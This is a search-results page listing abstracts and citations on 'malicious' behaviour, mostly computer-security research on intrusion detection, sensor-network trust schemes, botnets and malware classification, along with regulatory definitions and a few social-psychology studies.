  1. 75 FR 35508 - Draft Regulatory Guide: Issuance, Availability

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-06-22

    ... Systems and Networks,'' requires licensees to develop cyber-security plans and programs to protect critical digital assets, including digital safety systems, from malicious cyber attacks. Regulatory Guide 5.71, ``Cyber Security Programs for Nuclear Facilities,'' provides guidance to meet the requirements of...

  2. 18 CFR 39.1 - Definitions.

    Code of Federal Regulations, 2012 CFR

    2012-04-01

    ... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

  3. 18 CFR 39.1 - Definitions.

    Code of Federal Regulations, 2010 CFR

    2010-04-01

    ... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

  4. 18 CFR 39.1 - Definitions.

    Code of Federal Regulations, 2013 CFR

    2013-04-01

    ... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

  5. 18 CFR 39.1 - Definitions.

    Code of Federal Regulations, 2014 CFR

    2014-04-01

    ... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

  6. 18 CFR 39.1 - Definitions.

    Code of Federal Regulations, 2011 CFR

    2011-04-01

    ... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

  7. A Cross-Layer, Anomaly-Based IDS for WSN and MANET

    PubMed Central

    Amouri, Amar; Manthena, Raju

    2018-01-01

    Intrusion detection system (IDS) design for mobile ad hoc networks (MANET) is a crucial component for maintaining the integrity of the network. The need for rapid deployment of IDS capability with minimal data availability for training and testing is an important requirement of such systems, especially for MANETs deployed in highly dynamic scenarios, such as battlefields. This work proposes a two-level detection scheme for detecting malicious nodes in MANETs. The first level deploys dedicated sniffers working in promiscuous mode. Each sniffer utilizes a decision-tree-based classifier that generates quantities which we refer to as correctly classified instances (CCIs) every reporting time. In the second level, the CCIs are sent to an algorithmically run supernode that calculates quantities, which we refer to as the accumulated measure of fluctuation (AMoF) of the received CCIs for each node under test (NUT). A key concept that is used in this work is that the variability of the smaller size population which represents the number of malicious nodes in the network is greater than the variance of the larger size population which represents the number of normal nodes in the network. A linear regression process is then performed in parallel with the calculation of the AMoF for fitting purposes and to set a proper threshold based on the slope of the fitted lines. As a result, the malicious nodes are efficiently and effectively separated from the normal nodes. The proposed scheme is tested for various node velocities and power levels and shows promising detection performance even at low-power levels. The results presented also apply to wireless sensor networks (WSN) and represent a novel IDS scheme for such networks. PMID:29470446

  8. A Cross-Layer, Anomaly-Based IDS for WSN and MANET.

    PubMed

    Amouri, Amar; Morgera, Salvatore D; Bencherif, Mohamed A; Manthena, Raju

    2018-02-22

    Intrusion detection system (IDS) design for mobile ad hoc networks (MANET) is a crucial component for maintaining the integrity of the network. The need for rapid deployment of IDS capability with minimal data availability for training and testing is an important requirement of such systems, especially for MANETs deployed in highly dynamic scenarios, such as battlefields. This work proposes a two-level detection scheme for detecting malicious nodes in MANETs. The first level deploys dedicated sniffers working in promiscuous mode. Each sniffer utilizes a decision-tree-based classifier that generates quantities which we refer to as correctly classified instances (CCIs) every reporting time. In the second level, the CCIs are sent to an algorithmically run supernode that calculates quantities, which we refer to as the accumulated measure of fluctuation (AMoF) of the received CCIs for each node under test (NUT). A key concept that is used in this work is that the variability of the smaller size population which represents the number of malicious nodes in the network is greater than the variance of the larger size population which represents the number of normal nodes in the network. A linear regression process is then performed in parallel with the calculation of the AMoF for fitting purposes and to set a proper threshold based on the slope of the fitted lines. As a result, the malicious nodes are efficiently and effectively separated from the normal nodes. The proposed scheme is tested for various node velocities and power levels and shows promising detection performance even at low-power levels. The results presented also apply to wireless sensor networks (WSN) and represent a novel IDS scheme for such networks.

  9. Computer Abuse: Vandalizing the Information Society.

    ERIC Educational Resources Information Center

    Furnell, Steven M.; Warren, Matthew J.

    1997-01-01

    Computing and telecommunications, key to an information-based society, are increasingly targets for criminals and mischief makers. This article examines the effects of malicious computer abuse: hacking and viruses, highlights the apparent increase in incidents, and examines their effect on public perceptions of technology. Presents broad…

  10. 27 CFR 70.609 - Supervision.

    Code of Federal Regulations, 2012 CFR

    2012-04-01

    ... 27 Alcohol, Tobacco Products and Firearms 2 2012-04-01 2011-04-01 true Supervision. 70.609 Section... Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When allowance has... or made unmarketable, the liquors shall be destroyed by suitable means under supervision satisfactory...

  11. The Relationship between Personality and Computer Deviance

    ERIC Educational Resources Information Center

    Burns, Cardra E.

    2013-01-01

    Computer deviance by employees, defined as malicious and nonmalicious computer use behaviors, has contributed to billions of dollars of monetary and productivity losses for public and private sector organizations. The purpose of this correlational study was to examine the relationship between personality characteristics and employees' computer…

  12. The emotional responses of browsing Facebook: Happiness, envy, and the role of tie strength

    PubMed Central

    Lin, Ruoyun; Utz, Sonja

    2015-01-01

    On Facebook, users are exposed to posts from both strong and weak ties. Even though several studies have examined the emotional consequences of using Facebook, less attention has been paid to the role of tie strength. This paper aims to explore the emotional outcomes of reading a post on Facebook and examine the role of tie strength in predicting happiness and envy. Two studies – one correlational, based on a sample of 207 American participants and the other experimental, based on a sample of 194 German participants – were conducted in 2014. In Study 2, envy was further distinguished into benign and malicious envy. Based on a multi-method approach, the results showed that positive emotions are more prevalent than negative emotions while browsing Facebook. Moreover, tie strength is positively associated with the feeling of happiness and benign envy, whereas malicious envy is independent of tie strength after reading a (positive) post on Facebook. PMID:26877584

  13. A Case Study in Ethical Decision Making Regarding Remote Mitigation of Botnets

    NASA Astrophysics Data System (ADS)

    Dittrich, David; Leder, Felix; Werner, Tillmann

    It is becoming more common for researchers to find themselves in a position of being able to take over control of a malicious botnet. If this happens, should they use this knowledge to clean up all the infected hosts? How would this affect not only the owners and operators of the zombie computers, but also other researchers, law enforcement agents serving justice, or even the criminals themselves? What dire circumstances would change the calculus about what is or is not appropriate action to take? We review two case studies of long-lived malicious botnets that present serious challenges to researchers and responders and use them to illuminate many ethical issues regarding aggressive mitigation. We make no judgments about the questions raised, instead laying out the pros and cons of possible choices and allowing workshop attendees to consider how and where they would draw lines. By this, we hope to expose where there is clear community consensus as well as where controversy or uncertainty exists.

  14. Evil acts and malicious gossip: a multiagent model of the effects of gossip in socially distributed person perception.

    PubMed

    Smith, Eliot R

    2014-11-01

    Although person perception is central to virtually all human social behavior, it is ordinarily studied in isolated individual perceivers. Conceptualizing it as a socially distributed process opens up a variety of novel issues, which have been addressed in scattered literatures mostly outside of social psychology. This article examines some of these issues using a series of multiagent models. Perceivers can use gossip (information from others about social targets) to improve their ability to detect targets who perform rare negative behaviors. The model suggests that they can simultaneously protect themselves against being influenced by malicious gossip intended to defame specific targets. They can balance these potentially conflicting goals by using specific strategies including disregarding gossip that differs from a personally obtained impression. Multiagent modeling demonstrates the outcomes produced by different combinations of assumptions about gossip, and suggests directions for further research and theoretical development. © 2014 by the Society for Personality and Social Psychology, Inc.

  15. DCT-based cyber defense techniques

    NASA Astrophysics Data System (ADS)

    Amsalem, Yaron; Puzanov, Anton; Bedinerman, Anton; Kutcher, Maxim; Hadar, Ofer

    2015-09-01

    With the increasing popularity of video streaming services and multimedia sharing via social networks, there is a need to protect the multimedia from malicious use. An attacker may use steganography and watermarking techniques to embed malicious content, in order to attack the end user. Most of the attack algorithms are robust to basic image processing techniques such as filtering, compression, noise addition, etc. Hence, in this article two novel, real-time defense techniques are proposed: smart threshold and anomaly correction. Both techniques operate in the DCT domain and are applicable to JPEG images and H.264 I-frames. The defense performance was evaluated against a highly robust attack, and the perceptual quality degradation was measured by the well-known PSNR and SSIM quality assessment metrics. A set of defense techniques is suggested for improving the defense efficiency. For the most aggressive attack configuration, the combination of all the defense techniques results in 80% protection against cyber-attacks with a PSNR of 25.74 dB.

  16. Layered Location-Based Security Mechanism for Mobile Sensor Networks: Moving Security Areas.

    PubMed

    Wang, Ze; Zhang, Haijuan; Wu, Luqiang; Zhou, Chang

    2015-09-25

    Network security is one of the most important issues in mobile sensor networks (MSNs). Networks are particularly vulnerable in hostile environments because of many factors, such as uncertain mobility, limitations on computation, and the need for storage in mobile nodes. Though some location-based security mechanisms can resist some malicious attacks, they are only suitable for static networks and may sometimes require large amounts of storage. To solve these problems, using location information, which is one of the most important properties in outdoor wireless networks, a security mechanism called a moving security area (MSA) is proposed to resist malicious attacks by using mobile nodes' dynamic location-based keys. The security mechanism is layered by performing different detection schemes inside or outside the MSA. The location-based private keys will be updated only at the appropriate moments, considering the balance of cost and security performance. By transferring parts of the detection tasks from ordinary nodes to the sink node, the memory requirements are distributed to different entities to save limited energy.

  17. A robust trust establishment scheme for wireless sensor networks.

    PubMed

    Ishmanov, Farruh; Kim, Sung Won; Nam, Seung Yeob

    2015-03-23

    Security techniques like cryptography and authentication can fail to protect a network once a node is compromised. Hence, trust establishment continuously monitors and evaluates node behavior to detect malicious and compromised nodes. However, just like other security schemes, trust establishment is also vulnerable to attack. Moreover, malicious nodes might misbehave intelligently to trick trust establishment schemes. Unfortunately, attack-resistance and robustness issues with trust establishment schemes have not received much attention from the research community. Considering the vulnerability of trust establishment to different attacks and the unique features of sensor nodes in wireless sensor networks, we propose a lightweight and robust trust establishment scheme. The proposed trust scheme is lightweight thanks to a simple trust estimation method. The comprehensiveness and flexibility of the proposed trust estimation scheme make it robust against different types of attack and misbehavior. Performance evaluation under different types of misbehavior and on-off attacks shows that the detection rate of the proposed trust mechanism is higher and more stable compared to other trust mechanisms.

  18. Classifier fusion for VoIP attacks classification

    NASA Astrophysics Data System (ADS)

    Safarik, Jakub; Rezac, Filip

    2017-05-01

    SIP is one of the most successful protocols in the field of IP telephony communication. It establishes and manages VoIP calls. As the number of SIP implementations rises, we can expect a higher number of attacks on the communication system in the near future. This work aims at malicious SIP traffic classification. A number of machine learning algorithms have been developed for attack classification. The paper presents a comparison of current research and the use of a classifier fusion method, leading to a potential decrease in classification error rate. Use of classifier combination makes a more robust solution without the difficulties that may affect single algorithms. Different voting schemes, combination rules, and classifiers are discussed to improve the overall performance. All classifiers have been trained on real malicious traffic. The concept of traffic monitoring depends on a network of honeypot nodes. These honeypots run in several networks spread across different locations. Separation of honeypots allows us to gain independent and trustworthy attack information.

  19. Performance Evaluation of AODV with Blackhole Attack

    NASA Astrophysics Data System (ADS)

    Dara, Karuna

    2010-11-01

    A Mobile Ad Hoc Network (MANET) is a temporary network set up by wireless mobile computers moving arbitrarily in places that have no network infrastructure. These nodes maintain connectivity in a decentralized manner. Since the nodes communicate with each other, they cooperate by forwarding data packets to other nodes in the network. Thus the nodes find a path to the destination node using routing protocols. However, due to security vulnerabilities in the routing protocols, mobile ad-hoc networks are unprotected against attacks by malicious nodes. One of these attacks is the Black Hole Attack, an attack against network integrity that absorbs all data packets in the network. Since the data packets do not reach the destination node on account of this attack, data loss will occur. In this paper, we simulated the black hole attack in various mobile ad-hoc network scenarios using the AODV routing protocol of MANET and have tried to find the effect when the number of nodes is increased along with the number of malicious nodes.

  20. Encryption and the loss of patient data.

    PubMed

    Miller, Amalia R; Tucker, Catherine E

    2011-01-01

    Fast-paced IT advances have made it increasingly possible and useful for firms to collect data on their customers on an unprecedented scale. One downside of this is that firms can experience negative publicity and financial damage if their data are breached. This is particularly the case in the medical sector, where we find empirical evidence that increased digitization of patient data is associated with more data breaches. The encryption of customer data is often presented as a potential solution, because encryption acts as a disincentive for potential malicious hackers, and can minimize the risk of breached data being put to malicious use. However, encryption both requires careful data management policies to be successful and does not ward off the insider threat. Indeed, we find no empirical evidence of a decrease in publicized instances of data loss associated with the use of encryption. Instead, there are actually increases in the cases of publicized data loss due to internal fraud or loss of computer equipment.

  1. Guidelines for computer security in general practice.

    PubMed

    Schattner, Peter; Pleteshner, Catherine; Bhend, Heinz; Brouns, Johan

    2007-01-01

    As general practice becomes increasingly computerised, data security becomes increasingly important for both patient health and the efficient operation of the practice. The aim was to develop guidelines for computer security in general practice based on a literature review, an analysis of available information on current practice and a series of key stakeholder interviews. While the guideline was produced in the context of Australian general practice, we have developed a template that is also relevant for other countries. Current data on computer security measures was sought from Australian divisions of general practice. Semi-structured interviews were conducted with general practitioners (GPs), the medical software industry, senior managers within government responsible for health IT (information technology) initiatives, technical IT experts, divisions of general practice and a member of a health information consumer group. The respondents were asked to assess both the likelihood and the consequences of potential risks in computer security being breached. The study suggested that the most important computer security issues in general practice were: the need for a nominated IT security coordinator; having written IT policies, including a practice disaster recovery plan; controlling access to different levels of electronic data; doing and testing backups; protecting against viruses and other malicious code; installing firewalls; undertaking routine maintenance of hardware and software; and securing electronic communication, for example via encryption. This information led to the production of computer security guidelines, including a one-page summary checklist, which were subsequently distributed to all GPs in Australia. This paper maps out a process for developing computer security guidelines for general practice. The specific content will vary in different countries according to their levels of adoption of IT, and cultural, technical and other health service factors. Making these guidelines relevant to local contexts should help maximise their uptake.

  2. Colleges Struggle To Train Experts in Protecting Computer Systems.

    ERIC Educational Resources Information Center

    McCollum, Kelly

    2000-01-01

    Describes university courses and programs in protecting computer networks and World Wide Web sites from vandals, cyberterrorists, and malicious hackers. Notes such courses are provided by East Stroudsburg University (Pennsylvania), Purdue University (Indiana), George Mason University (Virginia), and Texas A&M University. Also notes the federal…

  3. SecureCore Security Architecture: Authority Mode and Emergency Management

    DTIC Science & Technology

    2007-10-16

    can shield first responders from social vultures (e.g., “ambulance chasers”) or malicious parties who could intentionally interfere with emergency...hierarchical design Communications Management: network communication Process Management...and Emergency Management 1 I. Introduction During many crises, first-responder access to sensitive, restricted emergency information is

  4. Understanding and Mitigating Forum Spam

    ERIC Educational Resources Information Center

    Shin, Youngsang

    2011-01-01

    The Web is large and expanding, making it challenging to attract new visitors to websites. Website operators often use Search Engine Optimization (SEO) techniques to boost the search engine rankings of their sites, thereby maximizing the inflow of visitors. Malicious operators take SEO to the extreme through many unsavory techniques that are often…

  5. Development and Validation of the Family Beliefs Inventory: A Measure of Unrealistic Beliefs among Parents and Adolescents.

    ERIC Educational Resources Information Center

    Roehling, Patricia Vincent; Robin, Arthur L.

    1986-01-01

    Evaluated the criterion-related validity of the Family Beliefs Inventory, a new self-report measure of unreasonable beliefs regarding parent-adolescent relationships. Distressed fathers displayed more unreasonable beliefs concerning ruination, obedience, perfectionism, and malicious intent than nondistressed fathers. Distressed adolescents…

  6. Security Implications of Third-Party Accelerators

    DTIC Science & Technology

    2015-06-11

    G. Wheeler, “Undocumented M6800 instructions,” BYTE Magazine, vol. 2, no. 12, pp. 46–47, Dec. 1977. [20] x0r1, “jellyfish,” https://github.com/x0r1... jellyfish, 2015. [21] A. Young and M. Yung, Malicious Cryptography: Exposing Cryptovirology. John Wiley & Sons, 2004.

  7. Computer Viruses: Prevention, Detection, and Treatment

    DTIC Science & Technology

    1990-03-12

    executed, also carries out its covert function, potentially undetected. This class of attack earned the term "Trojan horse" from the original of Greek ... mythology, signifying a gift which conceals a malicious purpose. 1 cause harm. The offending code may be present in a code segment the user "touches," which

  8. Partners or Competitors?: The Evolution of the DoD/CIA Relationship Since Desert Storm and its Prospects for the Future

    DTIC Science & Technology

    2013-05-23

    Afghanistan.” 39 the shoulders of these two organizations, but on Congressional choices as well. It...Christopher J. Lamb. United States Special Operations Forces. New York, NY: Columbia University Press, 2007. Walker, Stephen G, Akan Malici, and Mark

  9. On Tradeoffs between Trust Accuracy and Resource Consumption in Communications and Social Networks

    DTIC Science & Technology

    2016-04-11

    length, the use of indirect information to establish trust values, and the impact of misbehaving nodes on both communication overhead and the...evaluated). We consider the impact of misbehaving (selfish or malicious) nodes on the evaluation of trust. We also consider the interaction between

  10. Bringing out the Best Board Behavior

    ERIC Educational Resources Information Center

    Caruso, Nicholas

    2004-01-01

    The author's advice for a school board superintendent is to assume incompetence instead of malevolence. Board members who behave inappropriately are a minority, and those with malicious intent are extremely rare. Most misbehaving board members act out of frustration. They may not understand the appropriate role of a board member.…

  11. Integrated Social and Quality of Service Trust Management of Mobile Groups in Ad Hoc Networks

    DTIC Science & Technology

    2013-01-01

    high resiliency to malicious attacks and misbehaving nodes. Keywords—trust management; mobile ad hoc networks; QoS trust; social trust; trust...paper we address an important issue of trust management protocol design for MANETs: trust bias minimization despite misbehaving nodes performing

  12. Motivating Contributions for Home Computer Security

    ERIC Educational Resources Information Center

    Wash, Richard L.

    2009-01-01

    Recently, malicious computer users have been compromising computers en masse and combining them to form coordinated botnets. The rise of botnets has brought the problem of home computers to the forefront of security. Home computer users commonly have insecure systems; these users do not have the knowledge, experience, and skills necessary to…

  13. A Shellcode Detection Method Based on Full Native API Sequence and Support Vector Machine

    NASA Astrophysics Data System (ADS)

    Cheng, Yixuan; Fan, Wenqing; Huang, Wei; An, Jing

    2017-09-01

    Dynamically monitoring the behavior of a program is widely used to discriminate between benign programs and malware. The judgment is usually based on dynamic characteristics of the program, such as its API call sequence or API call frequency. The key innovation of this paper is to consider the full Native API sequence and use a support vector machine to detect shellcode. We also use a Markov chain to extract and digitize Native API sequence features. Our experimental results show that the method proposed in this paper has high accuracy and low detection rate.

  14. Integrating multiple data sources for malware classification

    DOEpatents

    Anderson, Blake Harrell; Storlie, Curtis B; Lane, Terran

    2015-04-28

    Disclosed herein are representative embodiments of tools and techniques for classifying programs. According to one exemplary technique, at least one graph representation of at least one dynamic data source of at least one program is generated. Also, at least one graph representation of at least one static data source of the at least one program is generated. Additionally, at least using the at least one graph representation of the at least one dynamic data source and the at least one graph representation of the at least one static data source, the at least one program is classified.

  15. PCASSO: a design for secure communication of personal health information via the internet.

    PubMed

    Baker, D B; Masys, D R

    1999-05-01

    The Internet holds both promise and peril for the communications of person-identifiable health information. Because of technical features designed to promote accessibility and interoperability rather than security, Internet addressing conventions and transport protocols are vulnerable to compromise by malicious persons and programs. In addition, most commonly used personal computer (PC) operating systems currently lack the hardware-based system software protection and process isolation that are essential for ensuring the integrity of trusted applications. Security approaches designed for electronic commerce, that trade known security weaknesses for limited financial liability, are not sufficient for personal health data, where the personal damage caused by unintentional disclosure may be far more serious. To overcome these obstacles, we are developing and evaluating an Internet-based communications system called PCASSO (Patient-centered access to secure systems online) that applies state of the art security to health information. PCASSO includes role-based access control, multi-level security, strong device and user authentication, session-specific encryption and audit trails. Unlike Internet-based electronic commerce 'solutions,' PCASSO secures data end-to-end: in the server; in the data repository; across the network; and on the client. PCASSO is designed to give patients as well as providers access to personal health records via the Internet.

  16. Patterns in Patient Access and Utilization of Online Medical Records: Analysis of MyChart

    PubMed Central

    2018-01-01

    Background: Electronic patient portals provide a new method for sharing personal medical information with individual patients. Objective: Our aim was to review utilization patterns of the largest online patient portal in Canada's largest city. Methods: We conducted a 4-year time-trend analysis of aggregated anonymous utilization data of the MyChart patient portal at Sunnybrook Health Sciences Centre in Ontario, Canada, from January 1, 2012, through December 31, 2015. Prespecified analyses examined trends related to day (weekend vs weekday), season (July vs January), year (2012 vs 2015), and an extreme adverse weather event (ice storm of December 20-26, 2013). Primary endpoints included three measures of patient portal activity: registrations, logins, and pageviews. Results: We identified 32,325 patients who registered for a MyChart account during the study interval. Time-trend analysis showed no sign of attenuating registrations over time. Logins were frequent, averaged 734 total per day, and showed an increasing trend over time. Pageviews mirrored logins, averaged about 3029 total per day, and equated to about 5 pageviews during the average login. The most popular pageviews were clinical notes, followed by laboratory results and medical imaging reports. All measures of patient activity were lower on weekends compared to weekdays (P<.001) yet showed no significant changes related to seasons or extreme weather. No major security breach, malware attack, or software failure occurred during the study. Conclusions: Online patient portals can provide a popular and reliable system for distributing personal medical information to active patients and may merit consideration for hospitals. PMID:29410386

  17. Characteristics of forest fuels, fire and emissions

    Treesearch

    Charles K. McMahon

    1983-01-01

    Introduction Forest fires can be divided into two broad classes--wildfires and prescribed fires. Wildfires, whether caused by nature (lightning, etc.) or by the accidental or malicious acts of man, are not planned by forest managers and do not occur under controlled conditions. They can be relatively tame, covering only a few hectares and burning...

  18. Transformative Rendering of Internet Resources

    DTIC Science & Technology

    2012-10-01

    4 Securing WiFi Connections...comes from legitimate web sites that have themselves been hacked. There is no way of anticipating which of these sites have been hacked and therefore...pose a security threat to visitors. The purpose of most of this web page hacking is to plant malicious code on the web site that will attack any

  19. Caught on Camera: Special Education Classrooms and Video Surveillance

    ERIC Educational Resources Information Center

    Heintzelman, Sara C.; Bathon, Justin M.

    2017-01-01

    In Texas, state policy anticipates that installing video cameras in special education classrooms will decrease student abuse inflicted by teachers. Lawmakers assume that collecting video footage will prevent teachers from engaging in malicious actions and prosecute those who choose to harm children. At the request of a parent, Section 29.022 of…

  20. MalWebID-Autodetection and Identification of Malicious Web Hosts Through Live Traffic Analysis

    DTIC Science & Technology

    2013-03-01

    blogs, video services, and popular social media sites. In December 2000, there were near 361 million Internet users and by the end of December 2012...site (i.e., Porn, Rx/Pharmaceutical, illegal activity, etc.) – propagate or contain viruses, spyware, or other harmful programs, participate in spamming

  1. Application of Cellular Automata to Detection of Malicious Network Packets

    ERIC Educational Resources Information Center

    Brown, Robert L.

    2014-01-01

    A problem in computer security is identification of attack signatures in network packets. An attack signature is a pattern of bits that characterizes a particular attack. Because there are many kinds of attacks, there are potentially many attack signatures. Furthermore, attackers may seek to avoid detection by altering the attack mechanism so that…

  2. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hamlet, Jason; Pierson, Lyndon; Bauer, Todd

    Supply chain security to detect, deter, and prevent the counterfeiting of networked and stand-alone integrated circuits (ICs) is critical to cyber security. Sandia National Laboratory researchers have developed IC ID to leverage Physically Unclonable Functions (PUFs) and strong cryptographic authentication to create a unique fingerprint for each integrated circuit. IC ID assures the authenticity of ICs to prevent tampering or malicious substitution.

  3. 36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

    Code of Federal Regulations, 2011 CFR

    2011-07-01

    ... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

  4. 36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

    Code of Federal Regulations, 2012 CFR

    2012-07-01

    ... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

  5. 36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

    Code of Federal Regulations, 2014 CFR

    2014-07-01

    ... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

  6. 36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

    Code of Federal Regulations, 2013 CFR

    2013-07-01

    ... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

  7. 77 FR 52043 - Privacy Act of 1974; Proposed Exempt New System of Records

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-08-28

    ... study. 6. After NIH makes a finding of research misconduct and has informed ORI of the finding... Internet traffic to and from federal computer networks to prevent malicious computer code from reaching the... portable/mobile devices including, but not limited to: Laptops, PDAs, USB drives, portable hard drives...

  8. Students Compete to Mount Best Defense against Malicious Hackers

    ERIC Educational Resources Information Center

    Mejia, Robin

    2008-01-01

    The need for colleges to graduate students who understand computer security is growing. The Internet Crime Complaint Center, a partnership of the FBI; the National White Collar Crime Center; and the Bureau of Justice Assistance, in the Department of Justice, reported more than 90,000 crimes in 2007, with reported financial losses of almost…

  9. Teaching Hackers: School Computing Culture and the Future of Cyber-Rights.

    ERIC Educational Resources Information Center

    Van Buren, Cassandra

    2001-01-01

    Discussion of the need for ethical computing strategies and policies at the K-12 level to acculturate computer hackers away from malicious network hacking focuses on a three-year participant observation ethnographic study conducted at the New Technology High School (California) that examined the school's attempts to socialize its hackers to act…

  10. A malicious pattern detection engine for embedded security systems in the Internet of Things.

    PubMed

    Oh, Doohwan; Kim, Deokho; Ro, Won Woo

    2014-12-16

    With the emergence of the Internet of Things (IoT), a large number of physical objects in daily life have been aggressively connected to the Internet. As the number of objects connected to networks increases, the security systems face a critical challenge due to the global connectivity and accessibility of the IoT. However, it is difficult to adapt traditional security systems to the objects in the IoT, because of their limited computing power and memory size. In light of this, we present a lightweight security system that uses a novel malicious pattern-matching engine. We limit the memory usage of the proposed system in order to make it work on resource-constrained devices. To mitigate performance degradation due to limitations of computation power and memory, we propose two novel techniques, auxiliary shifting and early decision. Through both techniques, we can efficiently reduce the number of matching operations on resource-constrained systems. Experiments and performance analyses show that our proposed system achieves a maximum speedup of 2.14 with an IoT object and provides scalable performance for a large number of patterns.

  11. TIUPAM: A Framework for Trustworthiness-Centric Information Sharing

    NASA Astrophysics Data System (ADS)

    Xu, Shouhuai; Sandhu, Ravi; Bertino, Elisa

    Information is essential to decision making. Nowadays, decision makers are often overwhelmed with large volumes of information, some of which may be inaccurate, incorrect, inappropriate, misleading, or maliciously introduced. With the advocated shift of the information sharing paradigm from “need to know” to “need to share”, this problem will be further compounded. This poses the challenge of achieving assured information sharing, so that decision makers can always get and utilize up-to-date information for making the right decisions, despite the existence of malicious attacks and without breaching the privacy of honest participants. As a first step towards answering this challenge, this paper proposes a systematic framework we call TIUPAM, which stands for “Trustworthiness-centric Identity, Usage, Provenance, and Attack Management.” The framework is centered on the need for trustworthiness and risk management for decision makers, and is supported by four key components: identity management, usage management, provenance management and attack management. We explore the characterization of both the core functions and the supporting components in the TIUPAM framework, which may guide the design and realization of concrete schemes in the future.

  12. A Secure Trust Establishment Scheme for Wireless Sensor Networks

    PubMed Central

    Ishmanov, Farruh; Kim, Sung Won; Nam, Seung Yeob

    2014-01-01

    Trust establishment is an important tool to improve cooperation and enhance security in wireless sensor networks. The core of trust establishment is trust estimation. If a trust estimation method is not robust against attack and misbehavior, the trust values produced will be meaningless, and system performance will be degraded. We present a novel trust estimation method that is robust against on-off attacks and persistent malicious behavior. Moreover, in order to aggregate recommendations securely, we propose using a modified one-step M-estimator scheme. The novelty of the proposed scheme arises from combining past misbehavior with current status in a comprehensive way. Specifically, we introduce an aggregated misbehavior component in trust estimation, which assists in detecting an on-off attack and persistent malicious behavior. In order to determine the current status of the node, we employ previous trust values and current measured misbehavior components. These components are combined to obtain a robust trust value. Theoretical analyses and evaluation results show that our scheme performs better than other trust schemes in terms of detecting an on-off attack and persistent misbehavior. PMID:24451471

  13. Privacy preservation and authentication on secure geographical routing in VANET

    NASA Astrophysics Data System (ADS)

    Punitha, A.; Manickam, J. Martin Leo

    2017-05-01

    Vehicular Ad hoc Networks (VANETs) play an important role in vehicle-to-vehicle communication as they offer a high level of safety and convenience to drivers. In order to increase the level of security and safety in VANETs, in this paper we propose a Privacy Preservation and Authentication on Secure Geographical Routing Protocol (PPASGR) for VANET. It provides security by detecting and preventing malicious nodes through two directional antennas, forward (f-antenna) and backward (b-antenna). Malicious nodes are detected by direction detection, consistency detection and conflict detection. The location of a trusted neighbour is identified using a TNT-based location verification scheme. After the Vehicle Tamper Proof Device (VTPD) is implemented, a Trusted Authority (TA) is generated that produces the anonymous credentials. Finally, the VTPD generates a pseudo-identity using the TA, which retrieves the real identity of the sender. Through this approach, authentication, integrity and confidentiality for routing packets can be achieved. The simulation results show that the proposed approach reduces packet drops due to attack and improves the packet delivery ratio.

  14. Detection, Localization, and Tracking of Unauthorized UAS and Jammers

    NASA Technical Reports Server (NTRS)

    Guvenc, Ismail; Ozdemir, Ozgur; Yapici, Yavuz; Mehrpouyan, Hani; Matolak, David

    2017-01-01

    Small unmanned aircraft systems (UASs) are expected to take major roles in future smart cities, for example, by delivering goods and merchandise, potentially serving as mobile hot spots for broadband wireless access, and maintaining surveillance and security. Although they can be used for the betterment of society, they can also be used by malicious entities to conduct physical and cyber attacks on infrastructure, private/public property, and people. Even for legitimate use-cases of small UASs, air traffic management (ATM) for UASs becomes of critical importance for maintaining safe and collision-free operation. Therefore, various ways to detect, track, and interdict potentially unauthorized drones carry critical importance for surveillance and ATM applications. In this paper, we will review techniques that rely on ambient radio frequency signals (emitted from UASs), radars, acoustic sensors, and computer vision techniques for detection of malicious UASs. We will present some early experimental and simulation results on radar-based range estimation of UASs, and receding horizon tracking of UASs. Subsequently, we will overview common techniques that are considered for interdiction of UASs.

  15. Microorganisms: Good or Evil, MIRRI Provides Biosecurity Awareness.

    PubMed

    Smith, David; Martin, Dunja; Novossiolova, Tatyana

    2017-03-01

